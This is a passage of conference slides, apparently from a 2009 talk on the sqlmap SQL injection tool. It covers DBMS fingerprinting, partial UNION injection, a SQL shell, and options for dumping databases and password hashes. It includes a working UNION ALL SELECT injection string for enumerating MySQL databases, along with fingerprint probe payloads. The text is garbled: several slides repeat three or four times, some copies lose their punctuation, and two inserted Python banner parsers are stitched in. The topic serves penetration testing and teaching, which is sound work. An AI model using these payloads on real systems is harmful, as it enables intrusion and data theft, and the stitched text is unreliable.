The two SQL queries injected to identify it are:
AND <integer>::int=<integer>
(SQL dialect)
AND COALESCE(<integer>, NULL)=<integer>
(specific function static output comparison)
Intercon III London – January 9 2009 – slide 32
DBMS fingerprint (4/4)
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005.
The techniques in use are three.
The result is:
active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
html error message fingerprint: Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions' static output comparison.
Intercon III London – January 9 2009 – slide 33
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
- Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.) – known technique
- Back-end DBMS operating system, by parsing the DBMS banner – over-looked technique
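As an added example (not part of the slides and not sqlmap code), a banner parser showing what the DBMS banner discloses without any extra request: the product, the exact build (the 9.00.1399 of the previous slide maps to SQL Server 2005 Service Pack 0) and, the over-looked point above, the operating system. The sample banners are constructed in the format of the real @@version / version() strings; the same function run on your own server's banner shows what one injected query would reveal.

```python
import re

# Windows NT kernel version -> marketed product name (well-known mapping).
NT_PRODUCT = {
    "5.0": "Windows 2000",
    "5.1": "Windows XP",
    "5.2": "Windows Server 2003",
    "6.0": "Windows Vista / Windows Server 2008",
    "6.1": "Windows 7 / Windows Server 2008 R2",
}

# SQL Server 2005 (9.00.x) build number -> service pack (well-known builds);
# 9.00.1399 is the RTM build the slide reports as "Service Pack 0".
MSSQL_2005_BUILDS = {
    1399: "Service Pack 0",
    2047: "Service Pack 1",
    3042: "Service Pack 2",
    4035: "Service Pack 3",
    5000: "Service Pack 4",
}


def parse_banner(banner):
    """Infer DBMS, version, service pack and host OS from a DBMS banner string.

    Handles the text returned by SQL Server @@version, PostgreSQL version() and
    MySQL @@version. Fields that cannot be inferred stay None.
    """
    info = {"dbms": None, "version": None, "service_pack": None, "os": None}

    m = re.search(r"Microsoft SQL Server\s+(\d{4})\s*-\s*(\d+)\.(\d+)\.(\d+)", banner)
    if m:
        product, major, minor, build = m.groups()
        info["dbms"] = "Microsoft SQL Server " + product
        info["version"] = "%s.%s.%s" % (major, minor, build)
        if major == "9":
            info["service_pack"] = MSSQL_2005_BUILDS.get(int(build), "unknown build")
        # The banner tail names the Windows kernel version, build and OS service pack.
        os_m = re.search(r"on Windows NT (\d+\.\d+) \(Build (\d+)(?::\s*([^)]+))?\)", banner)
        if os_m:
            nt, nt_build, nt_sp = os_m.groups()
            name = NT_PRODUCT.get(nt, "Windows NT " + nt)
            info["os"] = "%s (NT %s build %s%s)" % (
                name, nt, nt_build, ", " + nt_sp if nt_sp else "")
        return info

    m = re.search(r"PostgreSQL\s+(\d+(?:\.\d+)+)\s+on\s+(\S+?),", banner)
    if m:
        info["dbms"] = "PostgreSQL"
        info["version"] = m.group(1)
        triple = m.group(2)  # build target triple, e.g. i486-pc-linux-gnu
        if "linux" in triple:
            info["os"] = "Linux (%s)" % triple
        elif "mingw" in triple or "cygwin" in triple:
            info["os"] = "Windows (%s)" % triple
        elif "bsd" in triple:
            info["os"] = "BSD (%s)" % triple
        else:
            info["os"] = "unknown (%s)" % triple
        return info

    m = re.match(r"^(\d+\.\d+\.\d+[a-z]?)(?:-(\S+))?$", banner.strip())
    if m:
        info["dbms"] = "MySQL"
        info["version"] = m.group(1)
        suffix = (m.group(2) or "").lower()  # distribution build suffix, e.g. 3ubuntu5-log
        if "ubuntu" in suffix:
            info["os"] = "Ubuntu Linux"
        elif suffix:
            info["os"] = "unknown (build suffix %s)" % suffix
        return info

    return info


# Constructed sample banners in the format of the real @@version / version() output.
SAMPLE_BANNERS = {
    "mssql": ("Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n\tOct 14 2005 00:33:37 \n"
              "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
              "\tStandard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)"),
    "postgresql": "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1) 4.3.2",
    "mysql": "5.0.51a-3ubuntu5-log",
}

if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, parse_banner(banner))
```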
Intercon III London – January 9 2009 – slide 34
Second demo
"A demo? As in demolish or demonstration?" – Cyclops, X-Men: Evolution
Intercon III London – January 9 2009 – slide 35
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
- If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output
- If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them
Intercon III London – January 9 2009 – slide 36
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
- Detect all possible SQL injections and confirm them
- Identify the SQL query syntax
- Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatype, etc.
There is an option to dump the whole back-end DBMS.
Intercon III London – January 9 2009 – slide 37
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
- How to compare True and False HTTP responses
- A single or more testable parameters
- The SQL payload prefix and postfix
- A single or a range of entries to dump from a table
- A single or multiple columns to dump from a table
- Custom SQL statements to run
Options can be specified from both command line and/or configuration file.
Options are documented in the user's manual with examples.
Intercon III London – January 9 2009 – slide 38
Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." – Richard Stallman
Intercon III London – January 9 2009 – slide 39
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
- SQL injection on SQL clauses other than WHERE
- Time based blind SQL injection technique
...but I am working on these and others.
Intercon III London – January 9 2009 – slide 40
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
- Details on code internals
- Write access to the Subversion repository
- Access to the development platform
- A beer if you are in the London area
Intercon III London – January 9 2009 – slide 41
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
- http://sqlmap.sourceforge.net/dev/index.html
- http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
- https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
- E-mail / Jabber: bernardo.damele@gmail.com
- Blog: http://bernardodamele.blogspot.com
Intercon III London – January 9 2009 – slide 42
References
- OWASP Testing Guide, Open Web Application Security Project
- Exploit of a Mom, xkcd
- Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
- Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
- Metasploit Framework, H D Moore and the Metasploit development team
- w3af, Andres Riancho and the w3af development team
- Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
- Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
- Python difflib, Python Software Foundation
- NULL (SQL), Wikipedia
- Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
- Insight on UNION query SQL injection, Bernardo Damele A G
- DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Intercon III London – January 9 2009 – slide 43
Questions?
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
More on fingerprint
Fingerprinting is a key step in penetration testing, and it is not only about the back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the system underlying the back-end DBMS?
sqlmap can fingerprint both without making extra requests:
- Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): a known technique
- Back-end DBMS operating system, by parsing the DBMS banner: an over-looked technique

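As an added example (not sqlmap's code), the Python below parses the two sources named on this slide: response headers already received, and the DBMS banner (@@VERSION on SQL Server, version() on PostgreSQL) already retrieved through the injection. The header set and the two banners are constructed samples modelled on real IIS 6.0, SQL Server 2005 RTM and PostgreSQL 8.3 output; the NT-kernel-to-release and SQL Server 2005 build-to-service-pack tables are known mappings, and the service pack is derived from the build number because the banner text does not state it (which is how "Service Pack 0" appears on the previous slide).

```python
import re

# Constructed sample input, modelled on real IIS response headers and on the
# banners returned by @@VERSION (SQL Server) and version() (PostgreSQL).
SAMPLE_HEADERS = {
    "Server": "Microsoft-IIS/6.0",
    "X-Powered-By": "ASP.NET",
    "X-AspNet-Version": "2.0.50727",
}
SAMPLE_MSSQL_BANNER = (
    "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n"
    "\tOct 14 2005 00:33:37 \n"
    "\tCopyright (c) 1988-2005 Microsoft Corporation\n"
    "\tExpress Edition on Windows NT 5.2 (Build 3790: Service Pack 1)"
)
SAMPLE_PGSQL_BANNER = (
    "PostgreSQL 8.3.5 on x86_64-pc-linux-gnu, "
    "compiled by GCC gcc (Debian 4.3.2-1) 4.3.2"
)

# Known mappings: NT kernel version -> Windows release, SQL Server 2005 build -> SP.
NT_RELEASES = {"5.0": "Windows 2000", "5.1": "Windows XP",
               "5.2": "Windows Server 2003", "6.0": "Windows Vista / Server 2008"}
MSSQL_2005_SP_BUILDS = {"9.00.1399": "0", "9.00.2047": "1", "9.00.3042": "2",
                        "9.00.4035": "3", "9.00.5000": "4"}


def fingerprint_web_stack(headers):
    """Web server and application technology, read from headers the target
    already sent: no extra request is needed."""
    info = {}
    m = re.match(r"([\w-]+)/([\d.]+)", headers.get("Server", ""))
    if m:
        info["web_server"], info["web_server_version"] = m.group(1), m.group(2)
    powered = headers.get("X-Powered-By", "")
    if "X-AspNet-Version" in headers or powered.startswith("ASP.NET"):
        info["technology"] = "ASP.NET"
        if "X-AspNet-Version" in headers:
            info["technology_version"] = headers["X-AspNet-Version"]
    else:
        m = re.match(r"(PHP|Servlet|JSP)/?([\d.]*)", powered)
        if m:
            info["technology"] = m.group(1)
            if m.group(2):
                info["technology_version"] = m.group(2)
    return info


def fingerprint_dbms_os(banner):
    """DBMS release and build plus, the over-looked part, the operating system
    it runs on, all taken from the banner the DBMS itself returns."""
    info = {}
    m = re.search(r"Microsoft SQL Server (\d{4})\s*-\s*(\d+\.\d+\.\d+)", banner)
    if m:
        info["dbms"] = "Microsoft SQL Server " + m.group(1)
        info["dbms_build"] = m.group(2)
        sp = MSSQL_2005_SP_BUILDS.get(m.group(2))  # the SP is not spelled out in the banner
        if sp is not None:
            info["dbms_service_pack"] = sp
        m = re.search(r"on Windows NT (\d+\.\d+)(?: \(Build \d+(?:: Service Pack (\d+))?\))?", banner)
        if m:
            info["os"] = NT_RELEASES.get(m.group(1), "Windows NT " + m.group(1))
            if m.group(2):
                info["os_service_pack"] = m.group(2)
        return info
    m = re.search(r"PostgreSQL (\S+) on ([\w.-]+)", banner)
    if m:
        info["dbms"] = "PostgreSQL " + m.group(1)
        triple = m.group(2)  # GNU target triple, e.g. x86_64-pc-linux-gnu
        info["dbms_arch"] = triple.split("-")[0]
        for marker, os_name in (("linux", "Linux"), ("freebsd", "FreeBSD"),
                                ("solaris", "Solaris"), ("mingw", "Windows"),
                                ("darwin", "Mac OS X")):
            if marker in triple.lower():
                info["os"] = os_name
                break
        return info
    return info
```

On the constructed SQL Server banner this yields build 9.00.1399, service pack 0 (from the build table) and Windows Server 2003 SP1 (from the "Windows NT 5.2" part); on the PostgreSQL banner it yields an x86_64 Linux host from the target triple. Everything here is read from data already in hand, so it costs no additional requests, which is the point the slide makes.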
Second demo
"A demo, as in demolish or demonstration?" (Cyclops, X-Men: Evolution)

Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
- If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential (blind) or the UNION query technique to retrieve its output.
- If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.

Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
- Detect all possible SQL injections and confirm them
- Identify the SQL query syntax
- Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users and password hashes, check whether the session user is a DBA, enumerate table columns' data types, etc.
There is an option to dump the whole back-end DBMS.

Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
- How to compare True and False HTTP responses
- One or more testable parameters
- The SQL payload prefix and postfix
- A single entry or a range of entries to dump from a table
- A single column or multiple columns to dump from a table
- Custom SQL statements to run
Options can be specified from the command line and/or a configuration file.
Options are documented in the user's manual, with examples.

Third demo
"I get tons of uninteresting mail and system announcements about babies born, etc. At least a demo MIGHT have been interesting." (Richard Stallman)

Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
- SQL injection in SQL clauses other than WHERE
- The time-based blind SQL injection technique
...but I am working on these and others.

Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
- Details on code internals
- Write access to the Subversion repository
- Access to the development platform
- A beer, if you are in the London area

Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
- http://sqlmap.sourceforge.net/dev/index.html
- http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
- https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
- E-mail / Jabber: bernardo.damele@gmail.com
- Blog: http://bernardodamele.blogspot.com

References
- OWASP Testing Guide, Open Web Application Security Project
- Exploit of a Mom, xkcd
- Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
- Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
- Metasploit Framework, H D Moore and the Metasploit development team
- w3af, Andres Riancho and the w3af development team
- Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
